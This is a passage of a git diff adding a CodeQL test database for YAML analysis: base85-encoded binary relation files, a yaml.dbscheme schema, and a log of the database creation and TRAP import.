zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly KK!5;&p9?&Xo*VA~ literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml.rel b/ql/lib/test-db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..5f848073652e137ce970cd362a76f858865fd7c4 GIT binary patch literal 1416 zcmYk6>q{455QW$Bn`LHcR(98vQVOlq?%IVA2}L5JPhv=fh-gIgw|9G<-90b|4)c4@ z46|ou-~BaBGt@NA01Phh<1IYZ3(0%-_i*%opg*4`jzlM(==C$iQE2}m%KsAW{|26e zB6<7TV+>k9+V{8qF&u{?dF#)@2}Lkg{MhqSt9JGA<1;6r{jHB5dt8AcdHbJ-*A&5I z>93cYt=jcJ$#3f~!YSzU?Ei3ggrM`dor*P$VCpuRFO}Ek50)cU@RteZFf| z^y2d_+InQ2+M-P1L`;+=3!`>)p?`BG@eceTN@fwX2W+ z`)D7d7yk=rpQ01v-<^MsUi?2q+v#<`sq}xs?_H>Wzth||-|ZJDlGnfA>7F9kE&lEK zwN<yX~>pJ_p=! z&>@E%anv!#jX2??Q%*bMtaENV?}Cdix$KIouDR}pn{K)9frtKhZy$^o-=$B7E`{Ju_zWd?lKP`VC3IG5A literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea GIT binary patch literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..573ab48b75431cf7a24d52077aa8a0371ccb9604 GIT binary patch literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..7aae4dc38a0fef1277b98a50776a547dd54eafc3 GIT binary patch literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme new file mode 100755 index 00000000000..20d83c71ee6 --- /dev/null +++ b/ql/lib/test-db/db-yaml/yaml.dbscheme @@ -0,0 +1,80 @@ +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json new file mode 100644 index 00000000000..e69de29bb2d diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log new file mode 100644 index 00000000000..8c7f3e173b7 --- /dev/null +++ b/ql/lib/test-db/log/database-create-20240203.101754.571.log @@ -0,0 +1,275 @@ +[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test +[2024-02-03 10:17:54] Log file was started late. +[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. +[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test +[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). +[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:54] Plumbing command codeql database init completed. +[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... +[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] +[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db... +[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685 +[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything. +[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml +[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2) +[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2) +[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:55] Merging 1 fragment for 'files'. +[2024-02-03 10:17:55] Merged 8 bytes for 'files'. +[2024-02-03 10:17:55] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:55] Merged 80 bytes for 'folders'. +[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'. +[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'. +[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'. +[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:55] Saving string and id pools to disk. +[2024-02-03 10:17:55] Finished importing TRAP files. +[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data. +[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s) +[2024-02-03 10:17:55] String pool size: 2.05 MiB +[2024-02-03 10:17:55] ID pool size: 1.03 MiB +[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:55] Unpausing evaluation +[2024-02-03 10:17:55] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms). +[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms). +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml. +[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597 +[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:56] Unpausing evaluation +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml +[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms). +[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B). +[2024-02-03 10:17:56] Plumbing command codeql database finalize completed. +[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:56] Terminating normally. diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log new file mode 100644 index 00000000000..858ec59a13d --- /dev/null +++ b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log @@ -0,0 +1,15 @@ +[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml 